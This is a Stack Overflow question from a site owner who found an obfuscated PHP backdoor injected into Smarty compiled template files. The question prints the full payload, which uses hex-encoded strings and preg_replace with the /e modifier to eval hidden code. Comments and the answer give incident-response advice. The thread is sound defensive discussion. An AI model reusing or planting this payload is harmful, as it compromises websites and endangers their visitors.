# Smarty templates_c files have been injected with malicious code

Tags: php, security, smarty, xss, code-injection

All my smarty templates_c files start with this code:

```
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $lmfjhiujjg = '53Ld]53]Kc]55Ld]55#*<%x5cf]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-t%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5787fw6*%x5c%x787f_*#fubfsdudovg}{;#)tutjyf%x5c%x7860iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)x5c%x7825#%x5c%x782f#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-5]241]334]368]322]3]364]6]283]427]36]373P6]#!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x78225%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x%x66%152%x66%147%x67%42%x2c#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x782%x5c%x7825bss-%x5c%x7825r%x5c%x>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*rc%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fc%x7824-%x5c%x7824tvctus)%x5c%x7825po)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef7878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbs]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x7825#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x57878B%x5c%x7825h>#]y31]278]y3e]816%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y7x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88<h%x5c%x7825_t%x5c%x7825:%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7825ww2!>#p#%x5c%x785V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5cx5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~6c%x78246767~6<Cw6<pd%x5c%x7825wx785c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)6#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5mf!}Z;^nbsbq%x5c%x7825%%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7qj%x5c%x78257-K)udfoopdXA%x5c%x7822)825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7if((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (!isset(o]#%x5c%x782f*)323zbe!-)7gj6<*K)ftpmdXA6~6<u%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]22)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#2f#p#%x5c%x782f%x5c%x7825!-#1]#-bubE{h%x5c%x256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y7!#]y76]277]y72]265]y39]271]y83]256]y78tcvt)esp>hmg%x5c%x7825!<12>j%x5c%%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x78]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]ss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~]K78:56985:6197g:74985-rr.93e:5597f-s.973:c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x78604T7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x78sb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPx7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepd["%x61%156%x75%156%x61"]=1; function fjfgg($n){re6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x52f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x78256]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;%x5c%x787f!|!*uyfu%x5c%x7827k:!ftQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%27&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!tcvt)!gj!|!*bubE{h%x5c%x7825)j{%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>ojepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%eplace("%x2f%50%x2e%52265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y39]252x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%ldbqov>*ofmy%x5c%x78224-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5cufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opj7R37,18R#>q%x5c%x7825V<*#fopoV;hXk5%x5c%x7860{66~6<&w6<%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%%x7825tdz)%x5c%x7825bbT-%x5c%xepdof%x5c%x786057ftbc%163%x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%14#}#-#%x5c%x7824-%x5c%x7824-tusqpt)%x:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]25opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x788]y6g]273]y76]271]y7d]252]y74]25q%x5c%x78257**^#zsfvr#d%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%xf35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2bj%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x782c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%of.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5cNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72]y3x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%xx5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860uf*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785c7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7826#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5x5c%x7825tzw>!#]y76]277]y72]tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<#OSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5464]284]364]6]234]342]58]24]31#-%x5c%7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!%x5cc%x78e%x5c%x78b%x5c%x788297f:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]278]y37825-#1]#-bubE{h%x5c%x7825)tp36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]60GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%xk#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%xx5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x78%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x785c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pc%x78256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6osvufs:~:<*9-1-r%x5c%x78257825)!gj!<**2-4-bubE{h%x5c%x7825)su87fw6<*K)ftpmdXA6|7**197-2%x5c%x7827&6<%x5c%x787fw]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]ldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id24<%x5c%x7825j,,*!|%x5c%x78,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<825<#462]47y]252]18y]#r.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x782!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudc%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)f0%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-]256]y6g]257]y86]267]6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%8pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSU!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osv39275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmv5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjd]51]y35]274]y4:]82]y3:]62]y52]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-fid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)25j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvoduj%x7825fdy<Cb*[%x5c%x7825h!>!%x5c-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ld7gj6<*QDU%x5c%x7860MP5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{dx5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x78825<#372]58y]472]37y]672]48y]#>s%x5c%x7%x29%57%x65","%x65%166%x61%154%x28%151%x7u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c25)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%7825)tpqsut>j%x5c%x7825!*72!%x5c%x7878{**#k#)tutjyf%x5c%x786*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c6d]281]y43]78]y33]65]y31]55]y7<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x78275tpz!>!#]D6M7]K3#<%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbc%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]256d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%160%x28%42o:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L385]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", Nx7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x725mm)%x5c%x7825%x5c%x7878A)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#!%x5c%x7827{**u%x5c%x7x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x78hnpd!opjudovg!|!**#j{hnpd#)turn chr(ord($n)-1);} @error_reporting(0); preg_r5)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%xovg}%x5c%x7878;0]=])0#)U<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x8]y6g]273]y76]271]y7d]2ULL); }x7822)gj!|!*nbsbq%x5c%x7825)323ldfidkx7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sur%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b5c%x7825)sutcvt-#w#)$GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS<##!>!2p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x787neb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5cx5c%x7824%x5c%x785c%x5c%x7825j^%x55z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c5!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jtepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojx78257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x#Qi%x5c%x785c1^W%x5c%x7825c!>!%x825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x/(.*)/epreg_replacesovphzdccu'; $xprbtfgnxu = explode(chr((269-225)),'2239,67,9550,47,3159,49,9168,49,3796,22,8031,40,8516,69,772,27,4232,69,1506,63,1973,39,1890,31,3208,47,6391,37,4575,38,5331,62,1832,58,8374,38,8269,38,2329,27,5526,46,8071,70,1764,68,8848,65,6547,26,2089,36,7850,21,2995,37,6066,48,171,59,8938,39,5393,69,9882,40,5266,65,4553,22,4456,65,706,24,730,42,288,26,4089,23,6276,56,3475,68,4112,69,556,66,7311,36,5723,53,6428,58,2390,30,6573,24,7189,67,5141,58,6654,63,3340,57,7347,60,4002,55,314,26,4389,67,3638,65,4725,59,2526,20,8209,29,9967,39,5969,29,230,58,379,59,9530,20,3921,21,9217,55,6512,35,2645,33,9411,49,3607,31,9141,27,5653,70,665,41,9791,41,4677,48,6240,36,8141,68,6171,69,3102,57,4840,38,3543,64,9597,49,7256,55,6975,43,9832,50,9646,64,1228,68,3032,70,4926,38,992,52,9296,48,3743,53,9374,37,1044,40,4211,21,3397,33,2012,23,7925,67,3255,43,7797,53,7572,69,2947,48,7407,50,8585,49,7871,54,7051,55,8977,37,6114,57,2356,34,836,69,1705,59,6744,51,4057,32,3703,40,8238,31,7018,33,2853,52,6938,37,9272,24,9014,22,5462,64,476,21,2306,23,799,37,5625,28,3818,59,6597,57,2546,61,3298,42,7168,21,8796,52,1616,25,6486,26,2463,39,497,59,2187,52,10038,68,1181,47,7992,39,6852,22,936,56,1641,39,1569,47,4337,52,4521,32,5572,53,4784,56,9710,34,1084,35,438,38,4301,36,6332,59,4878,48,2678,52,6717,27,3942,60,9085,56,7696,69,1119,62,4964,57,7498,28,1361,58,340,39,10006,32,7457,41,3430,45,8435,34,2788,65,9036,49,5199,67,1921,52,7641,55,905,31,1473,33,2905,42,5905,64,25,44,6874,64,8412,23,5021,70,8634,53,2730,58,0,25,8307,38,7765,32,4181,30,6795,57,2420,43,622,43,5998,68,5776,37,8740,56,4613,64,9460,70,5091,50,5813,69,2035,54,2125,62,9922,45,3877,44,1680,25,2502,24,9744,47,69,63,5882,23,8913,25,132,39,7106,62,1419,54,8469,47,9344,23,7526,46,2607,38,1296,65,8345,29,8687,53,9367,7'); $fxiuoytapi=substr($lmfjhiujjg,(30707-20601),(45-38)); if (!function_exists('wxdfemgmrl')) { function wxdfemgmrl($cvuuzvbmzc, $pnrdqyabtg) { $cedmmmsdvd = NULL; for($tmiwgpbzmh=0;$tmiwgpbzmh<(sizeof($cvuuzvbmzc)/2);$tmiwgpbzmh++) { $cedmmmsdvd .= substr($pnrdqyabtg, $cvuuzvbmzc[($tmiwgpbzmh*2)],$cvuuzvbmzc[($tmiwgpbzmh*2)+1]); } return $cedmmmsdvd; };} $vptmdttcqp="\x20\57\x2a\40\x6f\153\x6e\155\x62\164\x74\161\x62\162\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\61\x30\55\x31\67\x33\51\x29\54\x20\143\x68\162\x28\50\x34\66\x33\55\x33\67\x31\51\x29\54\x20\167\x78\144\x66\145\x6d\147\x6d\162\x6c\50\x24\170\x70\162\x62\164\x66\147\x6e\170\x75\54\x24\154\x6d\146\x6a\150\x69\165\x6a\152\x67\51\x29\51\x3b\40\x2f\52\x20\151\x6f\162\x76\165\x75\153\x77\141\x69\40\x2a\57\x20"; $igmuucuert=substr($lmfjhiujjg,(32718-22605),(71-59)); $igmuucuert($fxiuoytapi, $vptmdttcqp, NULL); $igmuucuert=$vptmdttcqp; $igmuucuert=(506-385); $lmfjhiujjg=$igmuucuert-1; ?>
```

This seems to be dangerous. Is this a security breach in Smarty, or might it be a security breach that is only relevant to my server? Currently the folder has a 777 permission level (AFAIK that's what smarty requires). What are basic security checks you'd recommend checking?

Comment: @ceejayoz yea I get that. But question is if this might be related to smarty specifically, or an unrelated vulnerability I have. Also trying to make sure how to avoid this re-happening. Any tips on basic security php configs I should verify?

Comment: In my opinion the highly crypted malicious is not related to smarty.

Comment: @bub can you elaborate? I think understanding an hypothesis of how using smarty's arch to inject code into the temporary files might help me understand where my security fails.

Comment: No, it's unlikely to be Smarty itself.

Comment: You see the code also when ppl use wordpress MailPoet or just custom made pages. The code allows hackers to dynamically append any HTML or javascript.

Comment: BTW: Put the code into [unphp](http://www.unphp.net/) to see the real code behind it

Comment: @ceejayoz I assume it might be related to my security settings which are used by smarty's functions which write files in the temporary directory. Just not sure how that works exactly. Makes sense? How does smarty write those files?

Comment: See my answer. It's probably done by sending a request. You have to check your server logs to find out. Look for suspicious POST-requests, e.g. to your search-page, containing this text snippet or a base_64-encoded version of it.

Comment: I'm voting to close this question as off-topic because Stack Overflow is a poor place to discuss "I got hacked, what does this malcode do?"

Comment: @ScottArciszewski Was never asking what the malcode does, was more trying to understand how does smarty generates these temporary files in the first place, and it seems this code was injected through there. Where would you say is a good place to discuss that?

Comment: I would say, with the Smarty developers, in case you got hit by an unfixed vulnerability in Smarty. Failing that, http://www.gregfreeman.org/2013/steps-to-take-when-you-know-your-php-site-has-been-hacked/

Answer (score 2):

This is probably more related to general server security. Shutdown the site, but don't delete anything. Keeping it running will likely give you problems, e.g. your rank in search engines will plummet because you might distribute malware or something. So, just make your web server (e.g. apache) serve a static page instead.

First of all you have to find out how the perpetrators got access. This means checking your server's ssh-logs and also your apache-logs. Check whether they had database access. This is a tedious task and having knowledge what to look for and knowledge of regexps definitely helps, but still very tedious.

If you have version control for your code (which you should) you can check which files are different. There are various tools for checking file hashes.

After you found out how they got access and how to close the loophole you probably still have to start from scratch or the latest backup, you know isn't compromised. Don't guess, if you don't know if it's compromised consider it to be.